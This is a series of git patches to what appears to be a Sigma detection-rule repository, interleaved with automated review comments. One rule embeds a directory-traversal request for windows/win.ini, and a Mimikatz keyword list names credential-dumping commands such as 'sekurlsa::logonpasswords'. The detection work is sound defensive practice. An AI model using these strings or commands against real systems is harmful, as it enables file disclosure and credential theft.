 status: experimental
 description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds)
diff --git a/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml
index a29bfea4..2d32c405 100644
--- a/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-1983_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1983 exploitation attempt
-id: c4f29c4f-0281-4518-a824-88f259d92ef5
-Author: Subhash Popuri (@pbssubhash)
+id: 7325d138-af8e-42a1-80eb-a6b69c32da79
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the redTWITTER (com_redtwitter)
diff --git a/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml
index 20b4dc70..171ec24e 100644
--- a/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-2033_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2033 exploitation attempt
-id: b5c6267a-7b2e-47c8-84dd-68a89ceb1e64
-Author: Subhash Popuri (@pbssubhash)
+id: 2d38d9d5-b9a3-46dd-8f55-81c5961c21b2
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
diff --git a/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml
index f6c9adca..06d0b88e 100644
--- a/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-2036_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2036 exploitation attempt
-id: 5f89e5fb-6f87-4fee-96b2-700e987a1c7e
-Author: Subhash Popuri (@pbssubhash)
+id: ae8ea246-0ec4-48ed-96b1-e6ad8a8a0274
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach)
diff --git a/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml
index 70cc525b..3609a834 100644
--- a/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-2259_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2259 exploitation attempt
-id: 7ead4790-e0f8-41fa-bb14-f1d225964fd4
-Author: Subhash Popuri (@pbssubhash)
+id: a64bc24c-39fc-4531-b0c3-9d26f439f246
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component
diff --git a/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml
index 32008b7c..600ebee3 100644
--- a/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-2307_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2307 exploitation attempt
-id: 6e0a4fc5-c7a5-40c6-a080-bc5a452637a9
-Author: Subhash Popuri (@pbssubhash)
+id: 4d1124ea-beb9-4b9a-b75b-a76f61236a67
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Multiple directory traversal vulnerabilities in the web server for Motorola
diff --git a/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml
index 01e0fedc..94fcbdbc 100644
--- a/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-2682_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2682 exploitation attempt
-id: 5f7ea8cf-47e3-46e6-a173-43a99c904e43
-Author: Subhash Popuri (@pbssubhash)
+id: c190dd5f-7b3c-4184-bca0-94129a1a0cdb
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna)
diff --git a/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml
index 7dc8e6df..6513ed68 100644
--- a/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-2861_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-2861 exploitation attempt
-id: 21032758-8761-4a18-8f66-bace612e2481
-Author: Subhash Popuri (@pbssubhash)
+id: d98ff4e9-b11e-40b7-a536-b71bd1800042
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Multiple directory traversal vulnerabilities in the administrator console
diff --git a/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml
index ad2dab17..8d50a3c8 100644
--- a/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-3426_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-3426 exploitation attempt
-id: 06621f7e-2987-4625-8c42-d66951a9da9d
-Author: Subhash Popuri (@pbssubhash)
+id: 3178d248-aa37-4f7c-97ee-3c16809bca69
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone)
diff --git a/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml
index 5e4062f3..e8a4bb98 100644
--- a/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-4231_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-4231 exploitation attempt
-id: 8eb41b36-2b5a-44e0-a44b-b0ebdbff3e1b
-Author: Subhash Popuri (@pbssubhash)
+id: 52c315b8-c56e-41b9-ace4-fdfdc593657d
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: The CMNC-200 IP Camera has a built-in web server that is enabled by default.
diff --git a/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml
index 080cc881..9384cf9d 100644
--- a/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-4617_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-4617 exploitation attempt
-id: ed14d2cb-8716-4ab1-a819-36d173e617ab
-Author: Subhash Popuri (@pbssubhash)
+id: cc29de7e-88e9-4deb-ac0b-5072745ba6d5
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the JotLoader (com_jotloader) component
diff --git a/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml
index cf20ed0e..fb25c137 100644
--- a/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml
+++ b/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-5278 exploitation attempt
-id: 57bb7f1b-bb41-400d-a6e4-7eb2b70b3593
-Author: Subhash Popuri (@pbssubhash)
+id: 55a72ccd-4f16-42a7-afc8-f7958035bf90
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php
From 39daebffa4d5073a7ba3fc5ebdc0507ee75aa588 Mon Sep 17 00:00:00 2001
From: frack113 <62423083+frack113@users.noreply.github.com>
Date: Wed, 25 Aug 2021 20:02:38 +0200
Subject: [PATCH 0583/1367] Cleanup
---
 ...eb_cve_2010_5278_exploitation_attempt.yml} | 22 +++++++++----------
 1 file changed, 10 insertions(+), 12 deletions(-)
 rename rules/web/{web_cve_CVE-2010-5278_exploitation_attempt.yaml => web_cve_2010_5278_exploitation_attempt.yml} (52%)
diff --git a/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml b/rules/web/web_cve_2010_5278_exploitation_attempt.yml
similarity index 52%
rename from rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml
rename to rules/web/web_cve_2010_5278_exploitation_attempt.yml
index fb25c137..49100bc5 100644
--- a/rules/web/web_cve_CVE-2010-5278_exploitation_attempt.yaml
+++ b/rules/web/web_cve_2010_5278_exploitation_attempt.yml
@@ -1,26 +1,24 @@ -title: CVE-2010-5278 exploitation attempt +title: CVE-2010-5278 Exploitation Attempt id: 55a72ccd-4f16-42a7-afc8-f7958035bf90 author: Subhash Popuri (@pbssubhash) -date: 25/08/2021 +date: 2021/08/25 status: experimental description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter. references: -- https://www.exploit-db.com/exploits/34788 -- https://www.cvedetails.com/cve/CVE-2010-5278 -- https://github.com/projectdiscovery/nuclei-templates + - https://www.exploit-db.com/exploits/34788 + - https://www.cvedetails.com/cve/CVE-2010-5278 + - https://github.com/projectdiscovery/nuclei-templates detection: selection: - c-uri|contains: - - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00 + c-uri|contains: '/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00' condition: selection false_positives: -- Scanning from Nuclei -- Penetration Testing Activity -- Unknown + - Scanning from Nuclei + - Penetration Testing Activity tags: -- attack.initial_access -- attack.t1190 + - attack.initial_access + - attack.t1190 level: critical From bdb8dbc0dee81e235552d466f71582d29a85b1c6 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 25 Aug 2021 20:04:38 +0200 Subject: [PATCH 0584/1367] fix title Joomla JaShowcase --- rules/web/web_cve_2010_5278_exploitation_attempt.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_cve_2010_5278_exploitation_attempt.yml b/rules/web/web_cve_2010_5278_exploitation_attempt.yml index 49100bc5..3540cbf3 100644 --- a/rules/web/web_cve_2010_5278_exploitation_attempt.yml +++ b/rules/web/web_cve_2010_5278_exploitation_attempt.yml 
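Review bot: The single `c-uri|contains` scalar now pins the entire traversal string, including exactly ten `../` segments and the `windows/win.ini%00` tail, so the same `class_key` abuse with a different depth or target file is not matched; the list form it replaces had the same limitation, but folding it into one value makes the rule harder to extend later. Separating the invariant endpoint from the traversal marker keeps the rule specific while covering variants, e.g. `c-uri|contains|all:` with the two entries `'/manager/controllers/default/resource/tvs.php?class_key='` and `'../'`. Dropping the `Unknown` false-positive entry looks intentional and is fine.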
@@ -1,4 +1,4 @@ -title: CVE-2010-5278 Exploitation Attempt +title: CVE-2010-5278 Joomla JaShowcase Exploitation Attempt id: 55a72ccd-4f16-42a7-afc8-f7958035bf90 author: Subhash Popuri (@pbssubhash) date: 2021/08/25 From 3eb3377a7b89393786f2b5036ec82a9a6e8aec7b Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 26 Aug 2021 06:51:37 +0200 Subject: [PATCH 0585/1367] check valid date order --- tests/test_rules.py | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 4c01de39..730c2ed0 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -335,6 +335,9 @@ class TestRules(unittest.TestCase): elif len(datefield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'date' (not 10 chars, should be YYYY/MM/DD).".format(file)) faulty_rules.append(file) + elif datefield[4] != '/' or datefield[7] != '/': + print(Fore.YELLOW + "Rule {} has a malformed 'date' (should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with missing or malformed 'date' fields. (create one, e.g. date: 2019/01/14)") @@ -350,6 +353,9 @@ class TestRules(unittest.TestCase): elif len(modifiedfield) != 10: print(Fore.YELLOW + "Rule {} has a malformed 'modified' (not 10 chars, should be YYYY/MM/DD).".format(file)) faulty_rules.append(file) + elif modifiedfield[4] != '/' or modifiedfield[7] != '/': + print(Fore.YELLOW + "Rule {} has a malformed 'modified' (should be YYYY/MM/DD).".format(file)) + faulty_rules.append(file) self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'modified' fields. (create one, e.g. date: 2019/01/14)") From e66007a43d94c7591fbb42dd3fe3fc1b4779ae98 Mon Sep 17 00:00:00 2001 
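Review bot: The new title `CVE-2010-5278 Joomla JaShowcase Exploitation Attempt` disagrees with the rest of the file as shown in the previous hunk, whose description names MODx Revolution and `manager/controllers/default/resource/tvs.php` and whose references point at CVE-2010-5278; one of the two is attached to the wrong rule. Unless the description is the part that is wrong, the title should carry the product the description names, e.g. `title: CVE-2010-5278 MODx Revolution Exploitation Attempt`.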
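Review bot: The added `elif` only checks that characters 4 and 7 are `/`, so a ten-character value such as `20ab/cd/ef` (constructed example) still passes the `date` check, and the `modified` hunk below it has the same gap. Parsing the value once, `datetime.datetime.strptime(datefield, "%Y/%m/%d")` inside a `try` that appends to `faulty_rules` on `ValueError`, would replace both the length and the separator branches and also reject impossible dates, assuming `datetime` is imported in this module (not visible here). The enclosing test methods start and end outside these hunks.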
From: "f.hubaut"
Date: Thu, 26 Aug 2021 11:15:33 +0200
Subject: [PATCH 0586/1367] fix file name case
---
 ...uditd_susp_C2_commands.yml => lnx_auditd_susp_c2_commands.yml} | 0
 ...ation_LOLScript.yml => powershell_cl_invocation_lolscript.yml} | 0
 ...Script_v2.yml => powershell_cl_invocation_lolscript_count.yml} | 0
 ...s_LOLScript.yml => powershell_cl_mutexverifiers_lolscript.yml} | 0
 ...pt_v2.yml => powershell_cl_mutexverifiers_lolscript_count.yml} | 0
 ...L_Invocation_LOLScript.yml => win_cl_invocation_lolscript.yml} | 0
 ...erifiers_LOLScript.yml => win_cl_mutexverifiers_lolscript.yml} | 0
 7 files changed, 0 insertions(+), 0 deletions(-)
 rename rules/linux/auditd/{lnx_auditd_susp_C2_commands.yml => lnx_auditd_susp_c2_commands.yml} (100%)
 rename rules/windows/powershell/{powershell_CL_Invocation_LOLScript.yml => powershell_cl_invocation_lolscript.yml} (100%)
 rename rules/windows/powershell/{powershell_CL_Invocation_LOLScript_v2.yml => powershell_cl_invocation_lolscript_count.yml} (100%)
 rename rules/windows/powershell/{powershell_CL_Mutexverifiers_LOLScript.yml => powershell_cl_mutexverifiers_lolscript.yml} (100%)
 rename rules/windows/powershell/{powershell_CL_Mutexverifiers_LOLScript_v2.yml => powershell_cl_mutexverifiers_lolscript_count.yml} (100%)
 rename rules/windows/process_creation/{win_CL_Invocation_LOLScript.yml => win_cl_invocation_lolscript.yml} (100%)
 rename rules/windows/process_creation/{win_CL_Mutexverifiers_LOLScript.yml => win_cl_mutexverifiers_lolscript.yml} (100%)
diff --git a/rules/linux/auditd/lnx_auditd_susp_C2_commands.yml b/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml
similarity index 100%
rename from rules/linux/auditd/lnx_auditd_susp_C2_commands.yml
rename to rules/linux/auditd/lnx_auditd_susp_c2_commands.yml
diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript.yml
similarity index 100%
rename from rules/windows/powershell/powershell_CL_Invocation_LOLScript.yml
rename to rules/windows/powershell/powershell_cl_invocation_lolscript.yml
diff --git a/rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml b/rules/windows/powershell/powershell_cl_invocation_lolscript_count.yml
similarity index 100%
rename from rules/windows/powershell/powershell_CL_Invocation_LOLScript_v2.yml
rename to rules/windows/powershell/powershell_cl_invocation_lolscript_count.yml
diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml
similarity index 100%
rename from rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript.yml
rename to rules/windows/powershell/powershell_cl_mutexverifiers_lolscript.yml
diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml b/rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_count.yml
similarity index 100%
rename from rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml
rename to rules/windows/powershell/powershell_cl_mutexverifiers_lolscript_count.yml
diff --git a/rules/windows/process_creation/win_CL_Invocation_LOLScript.yml b/rules/windows/process_creation/win_cl_invocation_lolscript.yml
similarity index 100%
rename from rules/windows/process_creation/win_CL_Invocation_LOLScript.yml
rename to rules/windows/process_creation/win_cl_invocation_lolscript.yml
diff --git a/rules/windows/process_creation/win_CL_Mutexverifiers_LOLScript.yml b/rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml
similarity index 100%
rename from rules/windows/process_creation/win_CL_Mutexverifiers_LOLScript.yml
rename to rules/windows/process_creation/win_cl_mutexverifiers_lolscript.yml
From 8b318b9273055a057b22b59c34081b8612b5dd97 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Thu, 26 Aug 2021 12:51:45 +0200
Subject: [PATCH 0587/1367] refactor: Mimikatz keyword rule refactoring
---
 .../builtin/win_alert_mimikatz_keywords.yml | 27 +++++++++++--------
 1 file changed, 16 insertions(+), 11 deletions(-)
diff --git a/rules/windows/builtin/win_alert_mimikatz_keywords.yml b/rules/windows/builtin/win_alert_mimikatz_keywords.yml
index a9d26409..522a9f0a 100644
--- a/rules/windows/builtin/win_alert_mimikatz_keywords.yml
+++ b/rules/windows/builtin/win_alert_mimikatz_keywords.yml
@@ -3,7 +3,7 @@ id: 06d71506-7beb-4f22-8888-e2e5e2ca7fd8
 description: This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)
 author: Florian Roth
 date: 2017/01/10
-modified: 2019/10/11
+modified: 2021/08/26
 tags:
 - attack.s0002
 - attack.t1003 # an old one
@@ -19,18 +19,23 @@ logsource:
 product: windows
 detection:
 keywords:
- "mimikatz"
- "mimilib"
- "<3 eo.oe"
- "eo.oe.kiwi"
- "privilege::debug"
- "sekurlsa::logonpasswords"
- "lsadump::sam"
- "mimidrv.sys"
- " p::d "
- " s::l "
+ '\mimikatz'
+ 'mimikatz.exe'
+ '\mimilib.dll'
+ '<3 eo.oe'
+ 'eo.oe.kiwi'
+ 'privilege::debug'
+ 'sekurlsa::logonpasswords'
+ 'lsadump::sam'
+ 'mimidrv.sys'
+ ' p::d '
+ ' s::l '
+ 'gentilkiwi.com'
+ 'Kiwi Legit Printer'
 condition: keywords
 falsepositives:
 - Naughty administrators
 - Penetration test
+ - AV Signature updates
+ - Files with Mimikatz in their filename
 level: critical
From 217dbc768a83276fa44d895b4945f9874f8cd117 Mon Sep 17 00:00:00 2001
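Review bot: Replacing the bare `"mimikatz"` keyword with `'\mimikatz'` and `'mimikatz.exe'` narrows coverage: a log line that carries the name without a preceding backslash or `.exe` suffix, such as a PowerShell `Invoke-Mimikatz` invocation captured in a script-block or command-line field, no longer matches (subject to the backend's case handling), and `'\mimilib.dll'` narrows `"mimilib"` the same way. The new `Files with Mimikatz in their filename` false-positive entry suggests the narrowing is deliberate, but nothing in the rule records that; a comment next to the list, `# path/extension-qualified on purpose to cut noise from file names containing the word`, would stop the next reader from widening it again. If the broader match is still wanted for script logs, a separate `'Invoke-Mimikatz'` entry is cheap.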
From: phantinuss
Date: Thu, 26 Aug 2021 12:53:30 +0200
Subject: [PATCH 0588/1367] More malleable CobaltStrike C2 profiles from new source/reference
---
 .../pipe_created/sysmon_mal_cobaltstrike_re.yml | 14 ++++++++++++++
 .../sysmon_susp_cobaltstrike_pipe_patterns.yml | 8 +++++++-
 2 files changed, 21 insertions(+), 1 deletion(-)
diff --git a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml
index 97b9e587..8a652960 100644
--- a/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml
+++ b/rules/windows/pipe_created/sysmon_mal_cobaltstrike_re.yml
@@ -4,7 +4,9 @@ status: experimental
 description: Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
 references:
 - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
+ - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
 date: 2021/07/30
+modifed: 2021/08/26
 author: Florian Roth
 tags:
 - attack.defense_evasion
@@ -19,6 +21,7 @@ detection:
 - PipeName|re: '\\mojo\.5688\.8052\.183894939787088877[0-9a-f]{2}'
 - PipeName|re: '\\mojo\.5688\.8052\.35780273329370473[0-9a-f]{2}'
 - PipeName|re: '\\wkssvc[0-9a-f]{2}'
+ - PipeName|re: '\\wkssvc_[0-9a-f]{2}'
 - PipeName|re: '\\ntsvcs[0-9a-f]{2}'
 - PipeName|re: '\\DserNamePipe[0-9a-f]{2}'
 - PipeName|re: '\\SearchTextHarvester[0-9a-f]{2}'
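Review bot: `+modifed: 2021/08/26` misspells the key, so the repository's `modified` validation (the `modifiedfield` check in test_rules.py earlier on this page) presumably never sees this value, and any tooling that reads `modified` will treat the rule as never updated; the sibling rule edited by the same commit spells it `modified: 2021/08/26`. Fix the key: `modified: 2021/08/26`.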
@@ -29,6 +32,17 @@ detection:
 - PipeName|re: '\\ntsvcs_[0-9a-f]{2}'
 - PipeName|re: '\\scerpc_[0-9a-f]{2}'
 - PipeName|re: '\\scerpc[0-9a-f]{2}'
+ - PipeName|re: '\\PGMessagePipe[0-9a-f]{2}'
+ - PipeName|re: '\\MsFteWds[0-9a-f]{2}'
+ - PipeName|re: '\\f4c3[0-9a-f]{2}'
+ - PipeName|re: '\\fullduplex_[0-9a-f]{2}'
+ - PipeName|re: '\\msrpc_[0-9a-f]{4}'
+ - PipeName|re: '\\win\\msrpc_[0-9a-f]{2}'
+ - PipeName|re: '\\f53f[0-9a-f]{2}'
+ - PipeName|re: '\\rpc_[0-9a-f]{2}'
+ - PipeName|re: '\\spoolss_[0-9a-f]{2}'
+ - PipeName|re: '\\windows\.update\.manager[0-9a-f]{3}'
+ - PipeName|re: '\\Winsock2\\CatalogChangeListener-[0-9a-f]{3}-0,'
 condition: selection
 falsepositives:
 - Unknown
diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml
index c9a3da84..eb4066b0 100644
--- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml
+++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml
@@ -4,7 +4,9 @@ status: experimental
 description: Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
 references:
 - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
+ - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
 date: 2021/07/30
+modified: 2021/08/26
 author: Florian Roth
 tags:
 - attack.defense_evasion
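Review bot: The eleven added `PipeName|re` patterns end in `[0-9a-f]{2}` (or `{3}`/`{4}`) with no terminating anchor, so where a backend evaluates `re` as a search rather than a full match, `'\\rpc_[0-9a-f]{2}'` also fires on any longer pipe name that starts with `\rpc_` plus two hex digits; the pre-existing entries in this list have the same shape, so this is a consistency question rather than a regression. Appending `$` to the short-prefix entries (`\rpc_`, `\f53f`, `\f4c3`, `\msrpc_`) would make the intended length explicit where anchors are honoured. `'\\msrpc_[0-9a-f]{4}'` expects four hex digits while `'\\win\\msrpc_[0-9a-f]{2}'` expects two; worth confirming against the referenced gist that this is not a typo.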
@@ -16,13 +18,17 @@ logsource:
 definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). In the current popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config) this is not there, you have to add it yourself.'
 detection:
 selection_malleable_profiles:
- PipeName|startswith:
+ - PipeName|startswith:
 - '\mojo.5688.8052.183894939787088877'
 - '\mojo.5688.8052.35780273329370473'
 - '\mypipe-f'
 - '\mypipe-h'
 - '\ntsvcs_'
 - '\scerpc_'
+ - '\win_svc'
+ - PipeName:
+ - '\demoagent_11'
+ - '\demoagent_22'
 condition: selection_malleable_profiles
 falsepositives:
 - Chrome instances using the exactly same name pipe named mojo.something
From a231aa73b306a3330885d13af44f05a53e93d9e7 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Thu, 26 Aug 2021 13:33:25 +0200
Subject: [PATCH 0589/1367] fix: FPs with whoami rule and 4688 event IDs without parent info
---
 .../process_creation/win_susp_whoami_anomaly.yml | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/rules/windows/process_creation/win_susp_whoami_anomaly.yml b/rules/windows/process_creation/win_susp_whoami_anomaly.yml
index 62184377..123646b0 100644
--- a/rules/windows/process_creation/win_susp_whoami_anomaly.yml
+++ b/rules/windows/process_creation/win_susp_whoami_anomaly.yml
@@ -7,6 +7,7 @@ references:
 - https://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/
 author: Florian Roth
 date: 2021/08/12
+modified: 2021/08/26
 tags:
 - attack.discovery
 - attack.t1033
@@ -17,17 +18,22 @@ logsource:
 detection:
 selection:
 Image|endswith: '\whoami.exe'
- filter:
+ filter1:
 ParentImage|endswith:
 - '\cmd.exe'
 - '\powershell.exe'
+ filter2:
+ ParentImage:
+ - 'C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe'
+ - ''
+ - null
 selection_special:
 CommandLine|contains:
 - 'whoami -all'
 - 'whoami /all'
 - 'whoami.exe -all'
 - 'whoami.exe /all'
- condition: ( selection and not filter ) or selection_special
+ condition: ( selection and not filter1 and not filter2 ) or selection_special
 falsepositives:
 - Admin activity
 - Scripts and administrative tools used in the monitored environment
From 24d8701f15f4b771cf563657269acd8215994515 Mon Sep 17 00:00:00 2001
From: Florian Roth
Date: Thu, 26 Aug 2021 13:54:18 +0200
Subject: [PATCH 0590/1367] fix: null cannot be used in a list with other values
---
 rules/windows/process_creation/win_susp_whoami_anomaly.yml | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)
diff --git a/rules/windows/process_creation/win_susp_whoami_anomaly.yml b/rules/windows/process_creation/win_susp_whoami_anomaly.yml
index 123646b0..f802e6ef 100644
--- a/rules/windows/process_creation/win_susp_whoami_anomaly.yml
+++ b/rules/windows/process_creation/win_susp_whoami_anomaly.yml
@@ -26,14 +26,15 @@ detection:
 ParentImage:
 - 'C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe'
 - ''
- - null
+ filter3:
+ ParentImage: null
 selection_special:
 CommandLine|contains:
 - 'whoami -all'
 - 'whoami /all'
 - 'whoami.exe -all'
 - 'whoami.exe /all'
- condition: ( selection and not filter1 and not filter2 ) or selection_special
+ condition: ( selection and not filter1 and not filter2 and not filter3 ) or selection_special
 falsepositives:
 - Admin activity
 - Scripts and administrative tools used in the monitored environment
From 6c7d355ef5db5f8cd2d7c6c32f3cb250a3088582 Mon Sep 17 00:00:00 2001
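Review bot: `filter2` (with the `''` entry) and, after the follow-up fix in the second hunk, `filter3` (`ParentImage: null`) exclude every event that carries no parent image, so on log sources without parent-process data only `selection_special` (the `/all` variants) can ever fire; the commit subject says this targets 4688 events without parent info, but the rule body does not record the trade-off. A comment on `filter3`, `# drops events without parent data (e.g. 4688 without parent info); whoami is then only caught via selection_special`, would make the reduced coverage visible to whoever tunes the rule next. The `MonitoringHost.exe` exclusion is an exact path; presumably the agent only ever lives there, worth confirming.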
From: Florian Roth
Date: Thu, 26 Aug 2021 14:00:57 +0200
Subject: [PATCH 0591/1367] Try to add more pipe names to this non-regex rule
---
 .../sysmon_susp_cobaltstrike_pipe_patterns.yml | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)
diff --git a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml
index eb4066b0..07e196d8 100644
--- a/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml
+++ b/rules/windows/pipe_created/sysmon_susp_cobaltstrike_pipe_patterns.yml
@@ -7,7 +7,7 @@ references:
 - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
 date: 2021/07/30
 modified: 2021/08/26
-author: Florian Roth
+author: Florian Roth, Christian Burkard
 tags:
 - attack.defense_evasion
 - attack.privilege_escalation
@@ -26,9 +26,14 @@ detection:
 - '\ntsvcs_'
 - '\scerpc_'
 - '\win_svc'
+ - '\spoolss_'
+ - '\msrpc_'
+ - '\win\msrpc_'
+ - '\wkssvc_'
 - PipeName:
 - '\demoagent_11'
 - '\demoagent_22'
+ - '\PGMessagePipe'
 condition: selection_malleable_profiles
 falsepositives:
 - Chrome instances using the exactly same name pipe named mojo.something
From dc192685833106e9e994e10d316a9a2154d3456a Mon Sep 17 00:00:00 2001
From: phantinuss <79651203+phantinuss@users.noreply.github.com>
Date: Thu, 26 Aug 2021 14:25:12 +0200
